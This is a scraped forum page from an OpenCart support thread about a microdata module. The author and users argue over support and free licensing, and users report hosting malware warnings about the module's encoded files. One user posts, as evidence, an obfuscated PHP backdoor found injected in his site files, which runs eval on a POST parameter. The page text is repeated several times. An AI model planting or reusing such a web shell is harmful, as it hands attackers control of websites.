изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 0 коментарів 57 499 переглядів Sha 15 березня 2017 batch [Поддержка] Універсальний масовий редактор товарів. MultiEdit AI 1 2 3 4 11 Автор: Sha, 16 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 253 відповіді 58 260 переглядів Sha 17 листопада [Поддержка] 1 2 3 4 11 Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 269 відповідей 27 919 переглядів Frolly 11 листопада Accordion & Tabs - конструктор контенту - акордеон, вкладки, банер, слайдер, галерея, сітка, меню, popup, віджети та ін. Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 0 коментарів 36 152 перегляди Seriusis 21 квітня 2020 Rich Snippet - SEO Structured Data (Добавление разметки сайта)[Поддержка] Автор: kirians, 27 жовтня 2021 snippets rich snippets (і ще %d) Теги: snippets rich snippets structured data seo сниппет сниппеты сниппет google сніппет сніппети сео 3 відповіді 948 переглядів kirians 25 лютого 2022 Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Модулі та розширення SEO, карта сайта, оптимизация [Поддержка] Микроразметка + ОСТРОВА в YANDEX Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
emilbazilio Опубліковано: 20 листопада 2015 Share Опубліковано: 20 листопада 2015 Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже. До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога Надіслати Поділитися на інших сайтах More sharing options...
DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 Обращался к создателю за поддержкой в ЛС о работе модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже. До сегодняшнего дня тишина! Вот это поддержка! Модуль микроразметки перекашивает работу модуля Пав Блога Вечер добрый. Даже и не знаю с чего начать. Может переписку в личке опубликовать? Вы писали о том, что модуль выдает ошибки. Судя по ошибкам, не глядя даже на сайт, я предположил, что вы используете старую версию модуля. Предложил обновить. Вы самостоятельно обновили и ошибки с ваших же слов пропали. Дальше продолжать в чем заключалось ваше обращаение ко мне? Вы задали конкретный вопрос, на который я конкретно ответил. Но сам же предложил ради вашего же спокойствия проверить как вы сами модифицировали файлы модуля. Проверить я не смог сразу, так как отсутствовал более недели. В соседней тебе я одному человеку об этом уже писал. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 (змінено) Модуль микроразметки перекашивает работу модуля Пав Блога Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Змінено 20 листопада 2015 користувачем DariyGRAY Надіслати Поділитися на інших сайтах More sharing options... emilbazilio Опубліковано: 22 листопада 2015 Share Опубліковано: 22 листопада 2015 Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Ошибки о которых Вам писал в ЛС решились с помощью обновления модуля. Ошибка связанная с Блогом была как на старой версии модуля так и на новой если не модифицировать с дефолного на мой шаблон. Хотел чтобы Вы помогли разобраться с этим, вот и всё! По поводу того, что Вас не будет неделю я не знал, по этому не понял почему не взялись помочь. Рад что не отказываетесь помочь! Надіслати Поділитися на інших сайтах More sharing options... 2 months later... kamar87 Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Вот спасибо добрый человек, удачи вам! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Да, обновился - модуль теперь раздается бесплатно (это самое главное обновление) Надіслати Поділитися на інших сайтах More sharing options... Shenya155 Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ:) Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ :) Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Могу. Имя домена в личку или Skype напишите. Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... bombucho Опубліковано: 24 лютого 2016 Share Опубліковано: 24 лютого 2016 Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде. Не могу не задать два вопроса: правда ли про вирус и как обновить уже купленный модуль? Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 25 лютого 2016 Share Опубліковано: 25 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb.Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет." Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 26 лютого 2016 Share Опубліковано: 26 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. " отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите. А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус. И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают. А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), так что не советую связываться! Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 29 лютого 2016 Share Опубліковано: 29 лютого 2016 Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил. Надіслати Поділитися на інших сайтах More sharing options... Назад 8 9 10 11 12 13 14 15 16 Вперед Сторінка 13 з 16 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Схожі публікації batch Універсальний масовий редактор товарів. MultiEdit AI Автор: Sha, 15 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 0 коментарів 57 499 переглядів Sha 15 березня 2017 batch [Поддержка] Універсальний масовий редактор товарів. MultiEdit AI 1 2 3 4 11 Автор: Sha, 16 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 253 відповіді 58 260 переглядів Sha 17 листопада [Поддержка] 1 2 3 4 11 Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 269 відповідей 27 919 переглядів Frolly 11 листопада Accordion & Tabs - конструктор контенту - акордеон, вкладки, банер, слайдер, галерея, сітка, меню, popup, віджети та ін. Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 0 коментарів 36 152 перегляди Seriusis 21 квітня 2020 Rich Snippet - SEO Structured Data (Добавление разметки сайта)[Поддержка] Автор: kirians, 27 жовтня 2021 snippets rich snippets (і ще %d) Теги: snippets rich snippets structured data seo сниппет сниппеты сниппет google сніппет сніппети сео 3 відповіді 948 переглядів kirians 25 лютого 2022 Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Модулі та розширення SEO, карта сайта, оптимизация [Поддержка] Микроразметка + ОСТРОВА в YANDEX Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
DariyGRAY Опубліковано: 20 листопада 2015 Автор Share Опубліковано: 20 листопада 2015 (змінено) Модуль микроразметки перекашивает работу модуля Пав Блога Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Змінено 20 листопада 2015 користувачем DariyGRAY Надіслати Поділитися на інших сайтах More sharing options... emilbazilio Опубліковано: 22 листопада 2015 Share Опубліковано: 22 листопада 2015 Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Ошибки о которых Вам писал в ЛС решились с помощью обновления модуля. Ошибка связанная с Блогом была как на старой версии модуля так и на новой если не модифицировать с дефолного на мой шаблон. Хотел чтобы Вы помогли разобраться с этим, вот и всё! По поводу того, что Вас не будет неделю я не знал, по этому не понял почему не взялись помочь. Рад что не отказываетесь помочь! Надіслати Поділитися на інших сайтах More sharing options... 2 months later... kamar87 Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Вот спасибо добрый человек, удачи вам! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Да, обновился - модуль теперь раздается бесплатно (это самое главное обновление) Надіслати Поділитися на інших сайтах More sharing options... Shenya155 Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Чудесно, подарок, бесплатно, лицензия не нужна ? А с зашифрованными файлами как быть. Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ:) Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 4 лютого 2016 Share Опубліковано: 4 лютого 2016 Ничего пока не менял в исходниках (нет времени) - позже сделаю. Кому надо - пишите, вышлю ключ :) Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Надіслати Поділитися на інших сайтах More sharing options... DariyGRAY Опубліковано: 4 лютого 2016 Автор Share Опубліковано: 4 лютого 2016 Здравствуйте, можете выслать пожалуйста ключ, заранее спасибо за труд! Могу. Имя домена в личку или Skype напишите. Надіслати Поділитися на інших сайтах More sharing options... 3 weeks later... bombucho Опубліковано: 24 лютого 2016 Share Опубліковано: 24 лютого 2016 Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме поддержки появилось сообщение о вирусе в коде. Не могу не задать два вопроса: правда ли про вирус и как обновить уже купленный модуль? Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 25 лютого 2016 Share Опубліковано: 25 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb.Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое.Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет." Надіслати Поділитися на інших сайтах More sharing options... WolFRocK Опубліковано: 26 лютого 2016 Share Опубліковано: 26 лютого 2016 У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. " отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не делали, а было там также как в рег.ру (сработала говнозащита), вы у них сертификат или лицензию на антивирус попросите. А по поводу REG.RU у меня на сайте стояла защита, так вот ихняя непонятно-какая "говно защита" тоже срабатывала и говорила что это вирус. И я еще не говорю как они файлы пакетно на сайтах подменивают, а еще скачивают сайты и на биржах их продают. А тех.поддержка у них (время ответа примерно 5-ть РАБОЧИХ ДНЕЙ), так что не советую связываться! Надіслати Поділитися на інших сайтах More sharing options... investenergo Опубліковано: 29 лютого 2016 Share Опубліковано: 29 лютого 2016 Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил. Надіслати Поділитися на інших сайтах More sharing options... Назад 8 9 10 11 12 13 14 15 16 Вперед Сторінка 13 з 16 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Схожі публікації batch Універсальний масовий редактор товарів. MultiEdit AI Автор: Sha, 15 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 0 коментарів 57 499 переглядів Sha 15 березня 2017 batch [Поддержка] Універсальний масовий редактор товарів. MultiEdit AI 1 2 3 4 11 Автор: Sha, 16 березня 2017 top sale (і ще %d) Теги: top sale chat gpt pro атрибуты опции массовое редактирование editor products скидки мета мета-теги пакетное редактирование товаров админка групповое массовое массовая продукты быстрое изменение добавление добавить цена цены опций акции управление статус обработка категорий премиум групповая скидка товар стоимость валюта прайс price акция категория корзина продажа продажи баллы отзывы статьи галерея заказ быстрый обновление цены ocmod atribute модели автодополнение снипеты скорость модуль блоки форма product наполнение интернетмагазина обновление товар опции в категории универсальный рекомендуем opencart фильтр filter регистрация опция изменить товары категории производители українською українська chatgpt chatbots multi multiedit search replace replacer find search and replace find and replace edit seo faq seo faq filter products filter opencart filter for brands filter for products filter pro filteroc ocfilter oc filter open openai opencart ai ai opencart new 253 відповіді 58 260 переглядів Sha 17 листопада [Поддержка] 1 2 3 4 11 Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 269 відповідей 27 919 переглядів Frolly 11 листопада Accordion & Tabs - конструктор контенту - акордеон, вкладки, банер, слайдер, галерея, сітка, меню, popup, віджети та ін. Автор: Seriusis, 21 квітня 2020 вкладки табы (і ще %d) Теги: вкладки табы аккордеон step by step microdata faq tabs accordion шаги микроразметка галерея popup всплывающее окно всплывающее изображение шорткоды баннер меню выпадающее окно выпадающее меню dropdown подсказки tooltip question-answer меню категории произвольное меню слайдер галерея gallery виджет виджеты сетка 0 коментарів 36 152 перегляди Seriusis 21 квітня 2020 Rich Snippet - SEO Structured Data (Добавление разметки сайта)[Поддержка] Автор: kirians, 27 жовтня 2021 snippets rich snippets (і ще %d) Теги: snippets rich snippets structured data seo сниппет сниппеты сниппет google сніппет сніппети сео 3 відповіді 948 переглядів kirians 25 лютого 2022 Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Модулі та розширення SEO, карта сайта, оптимизация [Поддержка] Микроразметка + ОСТРОВА в YANDEX Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich
emilbazilio Опубліковано: 22 листопада 2015 Share Опубліковано: 22 листопада 2015 Об этом вобще речи не шло. Впервые от вас это слышу. P.S. Если проблема все-таки есть в работе модуля или его адаптации, то от поддержки я не отказываюсь. Ошибки о которых Вам писал в ЛС решились с помощью обновления модуля. Ошибка связанная с Блогом была как на старой версии модуля так и на новой если не модифицировать с дефолного на мой шаблон. Хотел чтобы Вы помогли разобраться с этим, вот и всё! По поводу того, что Вас не будет неделю я не знал, по этому не понял почему не взялись помочь. Рад что не отказываетесь помочь! Надіслати Поділитися на інших сайтах More sharing options...
kamar87 Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Я не понял, модуль обновился или нет? Появилось сообщение об обновлении... Надіслати Поділитися на інших сайтах More sharing options...
WolFRocK Опубліковано: 3 лютого 2016 Share Опубліковано: 3 лютого 2016 Вот спасибо добрый человек, удачи вам! Надіслати Поділитися на інших сайтах More sharing options...
